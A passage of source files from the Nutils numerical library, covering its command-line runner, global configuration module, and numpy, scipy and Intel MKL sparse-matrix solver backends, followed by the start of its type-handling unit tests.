for param in params:
cls = param.default.__class__
print(' --{:<20}'.format(param.name + '=' + cls.__name__.upper() if cls != bool else '(no)' + param.name), end=' ')
if param.annotation != param.empty:
print(param.annotation, end=' ')
print('[{}]'.format(param.default))
sys.exit(1)
kwargs = {param.name: param.default for param in params}
cli_config = {}
for arg in sys.argv[skip:]:
name, sep, value = arg.lstrip('-').partition('=')
if not sep:
value = not name.startswith('no')
if not value:
name = name[2:]
if name in kwargs:
default = kwargs[name]
args = kwargs
else:
try:
default = getattr(config, name)
except AttributeError:
print('invalid argument {!r}'.format(arg))
sys.exit(2)
args = cli_config
try:
if isinstance(default, bool) and not isinstance(value, bool):
        raise Exception('boolean value should be specified as --{0}/--no{0}'.format(name))
args[name] = default.__class__(value)
except Exception as e:
print('invalid argument for {!r}: {}'.format(name, e))
sys.exit(2)
with config(*configs, **cli_config):
status = call(func, kwargs, scriptname=os.path.basename(sys.argv[0]), funcname=None if skip==1 else func.__name__)
sys.exit(status)
def choose(*functions, loaduserconfig=True):
'''parse command line arguments and call one of multiple functions'''
assert functions, 'no functions specified'
funcnames = [func.__name__ for func in functions]
if len(sys.argv) == 1 or sys.argv[1] in ('-h', '--help'):
print('usage: {} [{}] (...)'.format(sys.argv[0], '|'.join(funcnames)))
sys.exit(1)
try:
ifunc = funcnames.index(sys.argv[1])
except ValueError:
print('invalid argument {!r}; choose from {}'.format(sys.argv[1], ', '.join(funcnames)))
sys.exit(2)
run(functions[ifunc], skip=2, loaduserconfig=loaduserconfig)
def call(func, kwargs, scriptname, funcname=None):
'''set up compute environment and call function'''
outdir = config.outdir or os.path.join(os.path.expanduser(config.outrootdir), scriptname)
with contextlib.ExitStack() as stack:
stack.enter_context(cache.enable(os.path.join(outdir, config.cachedir)) if config.cache else cache.disable())
stack.enter_context(matrix.backend(config.matrix))
stack.enter_context(log.set(log.FilterLog(log.RichOutputLog() if config.richoutput else log.StdoutLog(), minlevel=5-config.verbose)))
if config.htmloutput:
htmllog = stack.enter_context(log.HtmlLog(outdir, title=scriptname, htmltitle='<a href="http://www.nutils.org">{}</a> {}'.format(SVGLOGO, html.escape(scriptname)), favicon=FAVICON))
uri = (config.outrooturi.rstrip('/') + '/' + scriptname if config.outrooturi else pathlib.Path(outdir).resolve().as_uri()) + '/' + htmllog.filename
if config.richoutput:
t0 = time.perf_counter()
bar = lambda running: '{0} [{1}] {2[0]}:{2[1]:02d}:{2[2]:02d}'.format(uri, 'RUNNING' if running else 'STOPPED', _hms(time.perf_counter()-t0))
stack.enter_context(stickybar.activate(bar, update=1))
else:
log.info('opened log at', uri)
htmllog.write('<ul style="list-style-position: inside; padding-left: 0px; margin-top: 0px;">{}</ul>'.format(''.join(
'<li>{}={} <span style="color: gray;">{}</span></li>'.format(param.name, kwargs.get(param.name, param.default), param.annotation)
for param in inspect.signature(func).parameters.values())), level=1, escape=False)
stack.enter_context(log.add(htmllog))
stack.enter_context(warnings.via(log.warning))
stack.callback(signal.signal, signal.SIGINT, signal.signal(signal.SIGINT, _sigint_handler))
log.info('nutils v{}'.format(_version()))
log.info('start', time.ctime())
try:
func(**kwargs)
except (KeyboardInterrupt, SystemExit, pdb.bdb.BdbQuit):
log.error('killed by user')
return 1
except:
log.error(traceback.format_exc())
if config.pdb:
print(_mkbox(
'YOUR PROGRAM HAS DIED. The Python debugger',
'allows you to examine its post-mortem state',
'to figure out why this happened. Type "h"',
'for an overview of commands to get going.'))
pdb.post_mortem()
return 2
else:
log.info('finish', time.ctime())
return 0
SVGLOGO = '''\
<svg style="vertical-align: middle;" width="32" height="32" xmlns="http://www.w3.org/2000/svg">
<path d="M7.5 19 v-6 a6 6 0 0 1 12 0 v6 M25.5 13 v6 a6 6 0 0 1 -12 0 v-6" fill="none" stroke-width="3" stroke-linecap="round"/>
</svg>'''
FAVICON = 'data:image/png;base64,' \
'iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAQAAAD9CzEMAAACAElEQVRYw+2YS04bQRCGP2wJ' \
'gbAimS07WABXGMLzAgiBcgICFwDEEiGiDCScggWPHVseC1AIZ8AIJBA2hg1kF5DiycLYqppp' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'XU6ppH81Etp/wL7MKaEwo4sAAAAASUVORK5CYII='
# vim:sw=2:sts=2:et
```
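Besides `run`, the `choose` helper dispatches on the first command-line argument. A minimal sketch of a script with two entry points (function names and parameters are illustrative):
```python
# Minimal sketch of nutils.cli.choose; the first argv entry selects the function.
import nutils.cli
def mesh(nelems: 'number of elements' = 10):
  print('meshing with', nelems, 'elements')
def solve(tol: 'solver tolerance' = 1e-8):
  print('solving to tolerance', tol)
if __name__ == '__main__':
  nutils.cli.choose(mesh, solve)   # e.g. `python3 script.py mesh nelems=20`
```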
#### File: nutils/nutils/config.py
```python
import types, contextlib, sys
def load_rcfile(path):
settings = {}
try:
with open(path) as rc:
exec(rc.read(), {}, settings)
except Exception as e:
raise Exception('error loading config from {}'.format(path)) from e
return settings
class Config(types.ModuleType):
'''
This module holds the Nutils global configuration, stored as (immutable)
attributes. To inspect the current configuration, use :func:`print` or
:func:`vars` on this module. The configuration can be changed temporarily by
calling this module with the new settings passed as keyword arguments and
entering the returned context. The old settings are restored as soon as the
context is exited. Example:
>>> from nutils import config
>>> config.verbose
4
>>> with config(verbose=2, nprocs=4):
... # The configuration has been updated.
... config.verbose
2
>>> # Exiting the context reverts the changes:
>>> config.verbose
4
.. Note::
The default entry point for Nutils scripts :func:`nutils.cli.run` (and
:func:`nutils.cli.choose`) will read user configuration from disk.
.. Important::
The configuration is not thread-safe: changing the configuration inside a
thread changes the process wide configuration.
The following configuration properties are used in Nutils.
.. attribute:: nprocs
Controls the number of processes to use for computing integrals
(:meth:`nutils.topology.Topology.integrate`) and a few other expensive and
parallelizable functions.
Defaults to ``1``.
.. attribute:: verbose
Controls the level of verbosity of loggers. Log entries with a level
higher than :attr:`verbose` are omitted. The levels are ``1``: error,
``2``: warning, ``3``: user, ``4``: info and ``5``: debug.
Defaults to ``4``: info.
.. attribute:: dot
If ``True``, :meth:`nutils.sample.Sample.integrate` and
    :meth:`nutils.sample.Sample.eval` log a visualization of the function tree
that is being evaluated or integrated.
Defaults to ``False``.
The following properties are only used in :func:`nutils.cli.run` and
:func:`nutils.cli.choose`.
.. attribute:: outrootdir
Defines the root directory for general output.
Defaults to ``'~/public_html'``
.. attribute:: outdir
Defines the output directory for the HTML log and plots. Relative paths
are relative with respect to the current working directory (see
:func:`os.getcwd`).
Defaults to ``'<outrootdir>/<scriptname>/<YY/MM/DD/HH-MM-SS>'``
.. attribute:: cache
Controls on-disk caching. If ``True``, functions decorated with
:func:`nutils.cache.function` (e.g.
:meth:`nutils.topology.Topology.integrate`) and subclasses of
:class:`nutils.cache.Recursion` (e.g. :class:`nutils.solver.thetamethod`)
are automatically cached.
Defaults to ``False``.
.. attribute:: cachedir
Defines the location of the on-disk cache (see :attr:`cache`) relative to
``<outrootdir>/<scriptname>``.
Defaults to ``'cache'``.
.. attribute:: symlink
If not empty, the symlinks ``'<outrootdir>/<symlink>'`` and
``'<outrootdir>/<scriptname>/<symlink>'`` will be created, both pointing
to ``'<outrootdir>/<scriptname>/<YY/MM/DD/HH-MM-SS>'``.
Defaults to ``''``.
.. attribute:: richoutput
Controls whether or not the console logger should output rich text or
plain text.
Defaults to ``True`` if ``sys.stdout`` is attached to a terminal (i.e.
``sys.stdout.isatty()`` returns true), otherwise ``False``.
.. attribute:: htmloutput
If ``True`` the HTML logger is enabled and written to
``'<outrootdir>/<scriptname>/<YY/MM/DD/HH-MM-SS>/log.html'``
Defaults to ``True``.
.. attribute:: pdb
If ``True`` the debugger will be invoked when an exception reaches
:func:`nutils.cli.run` or :func:`nutils.cli.choose`.
Defaults to ``False``.
.. attribute:: matrix
A comma-separated list of matrix backends. The first one available is
    activated. The names (case is irrelevant) correspond to subclasses
    of :class:`nutils.matrix.Backend`. Use
    ``nutils.matrix.Backend.__subclasses__()`` to list the available backends.
    Defaults to ``'mkl,scipy,numpy'``.
'''
def __init__(*args, **data):
self, name = args
super(Config, self).__init__(name, self.__doc__)
self.__dict__.update(data)
def __setattr__(self, k, v):
raise AttributeError('readonly attribute: {}'.format(k))
def __delattr__(self, k):
raise AttributeError('readonly attribute: {}'.format(k))
@contextlib.contextmanager
def __call__(*args, **data):
if len(args) < 1:
raise TypeError('__call__ takes at least 1 positional argument but none were given')
self, *configs = args
configs.append(data)
old = self.__dict__.copy()
try:
for config in configs:
self.__dict__.update(config if isinstance(config, dict) else load_rcfile(config))
yield
finally:
self.__dict__.clear()
self.__dict__.update(old)
def __str__(self):
return 'configuration: {}'.format(', '.join('{}={!r}'.format(k, v) for k, v in sorted(self.__dict__.items()) if not k.startswith('_')))
sys.modules[__name__] = Config(
__name__,
nprocs = 1,
outrootdir = '~/public_html',
outrooturi = None,
outdir = '',
verbose = 4,
richoutput = False,
htmloutput = True,
pdb = False,
symlink = '',
dot = False,
cachedir = 'cache',
matrix = 'mkl,scipy,numpy',
cache = False,
)
# vim:sw=2:sts=2:et
```
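Because `load_rcfile` simply executes the file and collects its top-level assignments, a user configuration file is plain Python setting the attributes documented above. A hypothetical `~/.config/nutils/config`:
```python
# Hypothetical ~/.config/nutils/config, picked up by nutils.cli.run.
nprocs = 4               # parallelize integration over four processes
verbose = 3              # log up to the "user" level
richoutput = True        # force rich terminal output
matrix = 'scipy,numpy'   # skip the MKL backend even if libmkl is present
```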
#### File: nutils/nutils/matrix.py
```python
from . import numpy, numeric, warnings, cache, types, config, util
import abc, sys, ctypes, treelog as log
class MatrixError(Exception): pass
class Backend(metaclass=abc.ABCMeta):
'backend base class'
def __enter__(self):
if hasattr(self, '_old_backend'):
raise RuntimeError('This context manager is not reentrant.')
global _current_backend
self._old_backend = _current_backend
_current_backend = self
return self
def __exit__(self, etype, value, tb):
if not hasattr(self, '_old_backend'):
raise RuntimeError('This context manager is not yet entered.')
global _current_backend
_current_backend = self._old_backend
del self._old_backend
@abc.abstractmethod
def assemble(self, data, index, shape):
'''Assemble a (sparse) tensor based on index-value pairs.
.. Note:: This function is abstract.
'''
class Matrix(metaclass=types.CacheMeta):
'matrix base class'
def __init__(self, shape):
assert len(shape) == 2
self.shape = shape
@abc.abstractmethod
def __add__(self, other):
'add two matrices'
@abc.abstractmethod
def __mul__(self, other):
'multiply matrix with a scalar'
@abc.abstractmethod
  def __neg__(self):
'negate matrix'
def __sub__(self, other):
return self.__add__(-other)
def __rmul__(self, other):
return self.__mul__(other)
def __truediv__(self, other):
return self.__mul__(1/other)
@property
@abc.abstractmethod
def T(self):
'transpose matrix'
@property
def size(self):
return numpy.prod(self.shape)
def rowsupp(self, tol=0):
'return row indices with nonzero/non-small entries'
data, (row, col) = self.export('coo')
supp = numpy.zeros(self.shape[0], dtype=bool)
supp[row[abs(data) > tol]] = True
return supp
@abc.abstractmethod
def solve(self, rhs=None, *, lhs0=None, constrain=None, rconstrain=None, **solverargs):
'''Solve system given right hand side vector and/or constraints.
Args
----
rhs : :class:`float` vector or :any:`None`
Right hand side vector. `None` implies all zeros.
    lhs0 : :class:`float` vector or :any:`None`
Initial values. `None` implies all zeros.
constrain : :class:`float` or :class:`bool` array, or :any:`None`
Column constraints. For float values, a number signifies a constraint,
NaN signifies a free dof. For boolean, a True value signifies a
constraint to the value in `lhs0`, a False value signifies a free dof.
`None` implies no constraints.
rconstrain : :class:`bool` array or :any:`None`
      Row constraints. A True value signifies a constraint, a False value a free
dof. `None` implies that the constraints follow those defined in
`constrain` (by implication the matrix must be square).
Returns
-------
:class:`numpy.ndarray`
Left hand side vector.
'''
@abc.abstractmethod
def submatrix(self, rows, cols):
'''Create submatrix from selected rows, columns.
Args
----
rows : :class:`bool`/:class:`int` array selecting rows for keeping
cols : :class:`bool`/:class:`int` array selecting columns for keeping
Returns
-------
:class:`Matrix`
Matrix instance of reduced dimensions
'''
def export(self, form):
'''Export matrix data to any of supported forms.
Args
----
form : :class:`str`
- "dense" : return matrix as a single dense array
- "csr" : return matrix as 3-tuple of (data, indices, indptr)
- "coo" : return matrix as 2-tuple of (data, (row, col))
'''
raise NotImplementedError('cannot export {} to {!r}'.format(self.__class__.__name__, form))
def __repr__(self):
return '{}<{}x{}>'.format(type(self).__qualname__, *self.shape)
def preparesolvearguments(wrapped):
'''Make rhs optional, add lhs0, constrain, rconstrain arguments.
See Matrix.solve.'''
def solve(self, rhs=None, *, lhs0=None, constrain=None, rconstrain=None, **solverargs):
nrows, ncols = self.shape
if lhs0 is None:
x = numpy.zeros(ncols)
else:
x = numpy.array(lhs0, dtype=float)
assert x.shape == (ncols,)
if constrain is None:
J = numpy.ones(ncols, dtype=bool)
else:
assert constrain.shape == (ncols,)
if constrain.dtype == bool:
J = ~constrain
else:
J = numpy.isnan(constrain)
x[~J] = constrain[~J]
if rconstrain is None:
assert nrows == ncols
I = J
else:
assert rconstrain.shape == (nrows,) and constrain.dtype == bool
I = ~rconstrain
assert I.sum() == J.sum(), 'constrained matrix is not square: {}x{}'.format(I.sum(), J.sum())
if rhs is None:
rhs = 0.
b = (rhs - self.matvec(x))[J]
if b.any():
x[J] += wrapped(self if I.all() and J.all() else self.submatrix(I, J), b, **solverargs)
if not numpy.isfinite(x).all():
raise MatrixError('solver returned non-finite left hand side')
log.info('solver returned with residual {:.0e}'.format(numpy.linalg.norm((rhs - self.matvec(x))[J])))
else:
log.info('skipping solver because initial vector is exact')
return x
return log.withcontext(solve)
## NUMPY BACKEND
class Numpy(Backend):
'''matrix backend based on numpy array'''
def assemble(self, data, index, shape):
array = numeric.accumulate(data, index, shape)
return NumpyMatrix(array) if len(shape) == 2 else array
class NumpyMatrix(Matrix):
'''matrix based on numpy array'''
def __init__(self, core):
assert numeric.isarray(core)
self.core = core
super().__init__(core.shape)
def __add__(self, other):
if not isinstance(other, NumpyMatrix) or self.shape != other.shape:
return NotImplemented
return NumpyMatrix(self.core + other.core)
def __mul__(self, other):
if not numeric.isnumber(other):
return NotImplemented
return NumpyMatrix(self.core * other)
def __neg__(self):
return NumpyMatrix(-self.core)
@property
def T(self):
return NumpyMatrix(self.core.T)
def matvec(self, vec):
return numpy.dot(self.core, vec)
def export(self, form):
if form == 'dense':
return self.core
if form == 'coo':
ij = self.core.nonzero()
return self.core[ij], ij
if form == 'csr':
rows, cols = self.core.nonzero()
return self.core[rows, cols], cols, rows.searchsorted(numpy.arange(self.shape[0]+1))
raise NotImplementedError('cannot export NumpyMatrix to {!r}'.format(form))
def rowsupp(self, tol=0):
return numpy.greater(abs(self.core), tol).any(axis=1)
@preparesolvearguments
def solve(self, rhs):
try:
return numpy.linalg.solve(self.core, rhs)
except numpy.linalg.LinAlgError as e:
raise MatrixError(e) from e
def submatrix(self, rows, cols):
return NumpyMatrix(self.core[numpy.ix_(rows, cols)])
## SCIPY BACKEND
try:
import scipy.sparse.linalg
except ImportError:
pass
else:
class Scipy(Backend):
'''matrix backend based on scipy's sparse matrices'''
def assemble(self, data, index, shape):
if len(shape) < 2:
return numeric.accumulate(data, index, shape)
if len(shape) == 2:
csr = scipy.sparse.csr_matrix((data, index), shape)
return ScipyMatrix(csr)
raise MatrixError('{}d data not supported by scipy backend'.format(len(shape)))
class ScipyMatrix(Matrix):
'''matrix based on any of scipy's sparse matrices'''
def __init__(self, core):
self.core = core
super().__init__(core.shape)
def __add__(self, other):
if not isinstance(other, ScipyMatrix) or self.shape != other.shape:
return NotImplemented
return ScipyMatrix(self.core + other.core)
def __sub__(self, other):
if not isinstance(other, ScipyMatrix) or self.shape != other.shape:
return NotImplemented
return ScipyMatrix(self.core - other.core)
def __mul__(self, other):
if not numeric.isnumber(other):
return NotImplemented
return ScipyMatrix(self.core * other)
def __neg__(self):
return ScipyMatrix(-self.core)
def matvec(self, vec):
return self.core.dot(vec)
def export(self, form):
if form == 'dense':
return self.core.toarray()
if form == 'csr':
csr = self.core.tocsr()
return csr.data, csr.indices, csr.indptr
if form == 'coo':
coo = self.core.tocoo()
return coo.data, (coo.row, coo.col)
      raise NotImplementedError('cannot export ScipyMatrix to {!r}'.format(form))
@property
def T(self):
return ScipyMatrix(self.core.transpose())
@preparesolvearguments
def solve(self, rhs, atol=0, solver='spsolve', callback=None, precon=None, **solverargs):
if solver == 'spsolve':
log.info('solving system using sparse direct solver')
return scipy.sparse.linalg.spsolve(self.core, rhs)
assert atol, 'tolerance must be specified for iterative solver'
rhsnorm = numpy.linalg.norm(rhs)
if rhsnorm <= atol:
return numpy.zeros(self.shape[1])
log.info('solving system using {} iterative solver'.format(solver))
solverfun = getattr(scipy.sparse.linalg, solver)
myrhs = rhs / rhsnorm # normalize right hand side vector for best control over scipy's stopping criterion
mytol = atol / rhsnorm
niter = numpy.array(0)
def mycallback(arg):
niter[...] += 1
# some solvers provide the residual, others the left hand side vector
res = numpy.linalg.norm(myrhs - self.matvec(arg)) if numpy.ndim(arg) == 1 else float(arg)
if callback:
callback(res)
with log.context('residual {:.2e} ({:.0f}%)'.format(res, 100. * numpy.log10(res) / numpy.log10(mytol) if res > 0 else 0)):
pass
M = self.getprecon(precon) if isinstance(precon, str) else precon(self.core) if callable(precon) else precon
mylhs, status = solverfun(self.core, myrhs, M=M, tol=mytol, callback=mycallback, **solverargs)
if status != 0:
raise MatrixError('{} solver failed with status {}'.format(solver, status))
log.info('solver converged in {} iterations'.format(niter))
return mylhs * rhsnorm
def getprecon(self, name):
name = name.lower()
assert self.shape[0] == self.shape[1], 'constrained matrix must be square'
log.info('building {} preconditioner'.format(name))
if name == 'splu':
try:
precon = scipy.sparse.linalg.splu(self.core.tocsc()).solve
except RuntimeError as e:
raise MatrixError(e) from e
elif name == 'spilu':
try:
precon = scipy.sparse.linalg.spilu(self.core.tocsc(), drop_tol=1e-5, fill_factor=None, drop_rule=None, permc_spec=None, diag_pivot_thresh=None, relax=None, panel_size=None, options=None).solve
except RuntimeError as e:
raise MatrixError(e) from e
elif name == 'diag':
diag = self.core.diagonal()
if not diag.all():
raise MatrixError("building 'diag' preconditioner: diagonal has zero entries")
precon = numpy.reciprocal(diag).__mul__
else:
raise MatrixError('invalid preconditioner {!r}'.format(name))
return scipy.sparse.linalg.LinearOperator(self.shape, precon, dtype=float)
def submatrix(self, rows, cols):
return ScipyMatrix(self.core[rows,:][:,cols])
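# Illustrative sketch (assumption, not from the original source): solving with one of
# scipy's iterative Krylov solvers and the 'splu' preconditioner defined above.
#
#   A = Scipy().assemble(data, index, shape=(n, n))               # returns a ScipyMatrix
#   lhs = A.solve(rhs, solver='gmres', atol=1e-10, precon='splu')
#
# `data`, `index`, `rhs` and `n` are application-provided; iterative solvers require an
# explicit absolute tolerance `atol`, unlike the default sparse direct 'spsolve'.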
## INTEL MKL BACKEND
libmkl = util.loadlib(linux='libmkl_rt.so', darwin='libmkl_rt.dylib', win32='mkl_rt.dll')
if libmkl is not None:
# typedefs
c_int = types.c_array[numpy.int32]
c_long = types.c_array[numpy.int64]
c_double = types.c_array[numpy.float64]
libtbb = util.loadlib(linux='libtbb.so.2', darwin='libtbb.dylib', win32='tbb.dll')
class MKL(Backend):
'''matrix backend based on Intel's Math Kernel Library'''
def __enter__(self):
super().__enter__()
usethreads = config.nprocs > 1
libmkl.mkl_set_threading_layer(c_long(4 if usethreads else 1)) # 1:SEQUENTIAL, 4:TBB
if usethreads and libtbb:
self.tbbhandle = ctypes.c_void_p()
libtbb._ZN3tbb19task_scheduler_init10initializeEim(ctypes.byref(self.tbbhandle), ctypes.c_int(config.nprocs), ctypes.c_int(2))
else:
self.tbbhandle = None
return self
def __exit__(self, etype, value, tb):
if self.tbbhandle:
libtbb._ZN3tbb19task_scheduler_init9terminateEv(ctypes.byref(self.tbbhandle))
super().__exit__(etype, value, tb)
@staticmethod
def assemble(data, index, shape):
if len(shape) < 2:
return numeric.accumulate(data, index, shape)
if len(shape) == 2:
return MKLMatrix(data, index, shape)
      raise MatrixError('{}d data not supported by mkl backend'.format(len(shape)))
class Pardiso:
'''simple wrapper for libmkl.pardiso
https://software.intel.com/en-us/mkl-developer-reference-c-pardiso
'''
_pardiso = libmkl.pardiso
_errorcodes = {
-1: 'input inconsistent',
-2: 'not enough memory',
-3: 'reordering problem',
-4: 'zero pivot, numerical factorization or iterative refinement problem',
-5: 'unclassified (internal) error',
-6: 'reordering failed (matrix types 11 and 13 only)',
-7: 'diagonal matrix is singular',
-8: '32-bit integer overflow problem',
-9: 'not enough memory for OOC',
-10: 'error opening OOC files',
-11: 'read/write error with OOC files',
-12: 'pardiso_64 called from 32-bit library',
}
def __init__(self):
self.pt = numpy.zeros(64, numpy.int64) # handle to data structure
@types.apply_annotations
def __call__(self, *, phase:c_int, iparm:c_int, maxfct:c_int=1, mnum:c_int=1, mtype:c_int=0, n:c_int=0, a:c_double=None, ia:c_int=None, ja:c_int=None, perm:c_int=None, nrhs:c_int=0, msglvl:c_int=0, b:c_double=None, x:c_double=None):
error = ctypes.c_int32(1)
self._pardiso(self.pt.ctypes, maxfct, mnum, mtype, phase, n, a, ia, ja, perm, nrhs, iparm, msglvl, b, x, ctypes.byref(error))
if error.value:
raise MatrixError(self._errorcodes.get(error.value, 'unknown error {}'.format(error.value)))
def __del__(self):
if self.pt.any(): # release all internal memory for all matrices
self(phase=-1, iparm=numpy.zeros(64, dtype=numpy.int32))
assert not self.pt.any(), 'it appears that Pardiso failed to release its internal memory'
class MKLMatrix(Matrix):
'''matrix implementation based on sorted coo data'''
__cache__ = 'indptr',
_factors = False
def __init__(self, data, index, shape):
assert index.shape == (2, len(data))
if len(data):
# sort rows, columns
reorder = numpy.lexsort(index[::-1])
index = index[:,reorder]
data = data[reorder]
# sum duplicate entries
keep = numpy.empty(len(reorder), dtype=bool)
keep[0] = True
numpy.not_equal(index[:,1:], index[:,:-1]).any(axis=0, out=keep[1:])
if not keep.all():
index = index[:,keep]
data = numeric.accumulate(data, [keep.cumsum()-1], [index.shape[1]])
if not data.all():
nz = data.astype(bool)
data = data[nz]
index = index[:,nz]
self.data = numpy.ascontiguousarray(data, dtype=numpy.float64)
self.index = numpy.ascontiguousarray(index, dtype=numpy.int32)
super().__init__(shape)
@property
def indptr(self):
return self.index[0].searchsorted(numpy.arange(self.shape[0]+1)).astype(numpy.int32, copy=False)
def __add__(self, other):
if not isinstance(other, MKLMatrix) or self.shape != other.shape:
return NotImplemented
return MKLMatrix(numpy.concatenate([self.data, other.data]), numpy.concatenate([self.index, other.index], axis=1), self.shape)
def __sub__(self, other):
if not isinstance(other, MKLMatrix) or self.shape != other.shape:
return NotImplemented
return MKLMatrix(numpy.concatenate([self.data, -other.data]), numpy.concatenate([self.index, other.index], axis=1), self.shape)
def __mul__(self, other):
if not numeric.isnumber(other):
return NotImplemented
return MKLMatrix(self.data * other, self.index, self.shape)
def __neg__(self):
return MKLMatrix(-self.data, self.index, self.shape)
@property
def T(self):
return MKLMatrix(self.data, self.index[::-1], self.shape[::-1])
def matvec(self, vec):
rows, cols = self.index
return numeric.accumulate(self.data * vec[cols], [rows], [self.shape[0]])
def export(self, form):
if form == 'dense':
return numeric.accumulate(self.data, self.index, self.shape)
if form == 'csr':
return self.data, self.index[1], self.indptr
if form == 'coo':
return self.data, self.index
raise NotImplementedError('cannot export MKLMatrix to {!r}'.format(form))
def submatrix(self, rows, cols):
I, J = self.index
keep = numpy.logical_and(rows[I], cols[J])
csI = rows.cumsum()
csJ = cols.cumsum()
return MKLMatrix(self.data[keep], numpy.array([csI[I[keep]]-1, csJ[J[keep]]-1]), shape=(csI[-1], csJ[-1]))
@preparesolvearguments
def solve(self, rhs):
log.info('solving {0}x{0} system using MKL Pardiso'.format(self.shape[0]))
if self._factors:
log.info('reusing existing factorization')
pardiso, iparm, mtype = self._factors
phase = 33 # solve, iterative refinement
else:
pardiso = Pardiso()
iparm = numpy.zeros(64, dtype=numpy.int32) # https://software.intel.com/en-us/mkl-developer-reference-c-pardiso-iparm-parameter
iparm[0] = 1 # supply all values in components iparm[1:64]
iparm[1] = 2 # fill-in reducing ordering for the input matrix: nested dissection algorithm from the METIS package
iparm[9] = 13 # pivoting perturbation threshold 1e-13 (default for nonsymmetric)
iparm[10] = 1 # enable scaling vectors (default for nonsymmetric)
iparm[12] = 1 # enable improved accuracy using (non-) symmetric weighted matching (default for nonsymmetric)
iparm[34] = 1 # zero base indexing
mtype = 11 # real and nonsymmetric
phase = 13 # analysis, numerical factorization, solve, iterative refinement
self._factors = pardiso, iparm, mtype
lhs = numpy.empty(self.shape[1], dtype=numpy.float64)
pardiso(phase=phase, mtype=mtype, iparm=iparm, n=self.shape[0], nrhs=1, b=rhs, x=lhs, a=self.data, ia=self.indptr, ja=self.index[1])
return lhs
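# Illustrative note (assumption): because the Pardiso handle, iparm and mtype are cached
# in self._factors, repeated solves with the same MKLMatrix reuse the factorization:
#
#   x1 = A.solve(rhs1)   # phase 13: analysis, factorization, solve
#   x2 = A.solve(rhs2)   # phase 33: solve with iterative refinement only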
## MODULE METHODS
_current_backend = Numpy()
def backend(names):
for name in names.lower().split(','):
for cls in Backend.__subclasses__():
if cls.__name__.lower() == name:
return cls()
raise RuntimeError('matrix backend {!r} is not available'.format(names))
def assemble(data, index, shape):
return _current_backend.assemble(data, index, shape)
def diag(d):
assert d.ndim == 1
return assemble(d, index=numpy.arange(len(d))[numpy.newaxis].repeat(2, axis=0), shape=d.shape*2)
def eye(n):
return diag(numpy.ones(n))
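# Illustrative sketch (assumption): the module-level helpers assemble through the
# currently active backend (Numpy by default), e.g.
#
#   I3 = eye(3)                                   # 3x3 identity as a NumpyMatrix
#   lhs = I3.solve(numpy.array([1., 2., 3.]))     # -> array([1., 2., 3.])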
# vim:sw=2:sts=2:et
```
#### File: nutils/tests/test_types.py
```python
from nutils.testing import *
import nutils.types
import inspect, pickle, itertools, ctypes, operator
import numpy
class apply_annotations(TestCase):
def test_without_annotations(self):
@nutils.types.apply_annotations
def f(a, b):
return a, b
a, b = f(1, 2)
self.assertEqual(a, 1)
self.assertEqual(b, 2)
def test_pos_or_kw(self):
@nutils.types.apply_annotations
def f(a:int, b, c:str):
return a, b, c
a, b, c = f(1, 2, 3)
self.assertEqual(a, 1)
self.assertEqual(b, 2)
self.assertEqual(c, '3')
def test_with_signature(self):
def f(a):
return a
f.__signature__ = inspect.Signature([inspect.Parameter('a', inspect.Parameter.POSITIONAL_OR_KEYWORD, annotation=str)])
f = nutils.types.apply_annotations(f)
self.assertEqual(f(1), '1')
def test_posonly(self):
def f(a):
return a
f.__signature__ = inspect.Signature([inspect.Parameter('a', inspect.Parameter.POSITIONAL_ONLY, annotation=str)])
f = nutils.types.apply_annotations(f)
self.assertEqual(f(1), '1')
def test_kwonly(self):
@nutils.types.apply_annotations
def f(a:str, *, b:int, c:bool):
return a, b, c
self.assertEqual(f(1, b='2', c=3), ('1', 2, True))
def test_varpos(self):
@nutils.types.apply_annotations
def f(a:str, *args):
return a, args
self.assertEqual(f(1, 2, 3), ('1', (2, 3)))
def test_varpos_annotated(self):
map_str = lambda args: map(str, args)
@nutils.types.apply_annotations
def f(a:str, *args:map_str):
return a, args
self.assertEqual(f(1, 2, 3), ('1', ('2', '3')))
def test_varkw(self):
@nutils.types.apply_annotations
def f(a:str, **kwargs):
return a, kwargs
self.assertEqual(f(1, b=2, c=3), ('1', dict(b=2, c=3)))
def test_varkw_annotated(self):
map_str = lambda kwargs: {k: str(v) for k, v in kwargs.items()}
@nutils.types.apply_annotations
def f(a:str, **kwargs:map_str):
return a, kwargs
self.assertEqual(f(1, b=2, c=3), ('1', dict(b='2', c='3')))
def test_posonly_varkw(self):
def f(a, b, **c):
return a, b, c
f.__signature__ = inspect.Signature([inspect.Parameter('a', inspect.Parameter.POSITIONAL_ONLY, annotation=str),
inspect.Parameter('b', inspect.Parameter.POSITIONAL_OR_KEYWORD, annotation=str, default=None),
inspect.Parameter('c', inspect.Parameter.VAR_KEYWORD)])
f = nutils.types.apply_annotations(f)
self.assertEqual(f(1, c=2, d=3), ('1', None, dict(c=2, d=3)))
self.assertEqual(f(1, None, c=2, d=3), ('1', None, dict(c=2, d=3)))
self.assertEqual(f(1, b=None, c=2, d=3), ('1', None, dict(c=2, d=3)))
self.assertEqual(f(1, b=4, c=2, d=3), ('1', '4', dict(c=2, d=3)))
def test_default_none(self):
@nutils.types.apply_annotations
def f(a:str=None):
return a
self.assertEqual(f(), None)
self.assertEqual(f(None), None)
self.assertEqual(f(1), '1')
class nutils_hash(TestCase):
def test_ellipsis(self):
self.assertEqual(nutils.types.nutils_hash(...).hex(), '0c8bce06e451e4d5c49f60da0abf2ccbadf80600')
def test_None(self):
self.assertEqual(nutils.types.nutils_hash(None).hex(), 'bdfcbd663476b2db5b2b2e59a6d93882a908dc76')
def test_bool(self):
self.assertEqual(nutils.types.nutils_hash(False).hex(), '04a5e8f73dcea55dcd7482a476cf2e7b53d6dc50')
self.assertEqual(nutils.types.nutils_hash(True).hex(), '3fe990437e1624c831729f2866979254437bb7e9')
def test_int(self):
self.assertEqual(nutils.types.nutils_hash(1).hex(), '00ec7dea895ebd921e56bbc554688d8b3a1e4dfc')
self.assertEqual(nutils.types.nutils_hash(2).hex(), '8ae88fa39407cf75e46f9e0aba8c971de2256b14')
def test_float(self):
self.assertEqual(nutils.types.nutils_hash(1.).hex(), 'def4bae4f2a3e29f6ddac537d3fa7c72195e5d8b')
self.assertEqual(nutils.types.nutils_hash(2.5).hex(), '5216c2bf3c16d8b8ff4d9b79f482e5cea0a4cb95')
def test_complex(self):
self.assertEqual(nutils.types.nutils_hash(1+0j).hex(), 'cf7a0d933b7bb8d3ca252683b137534a1ecae073')
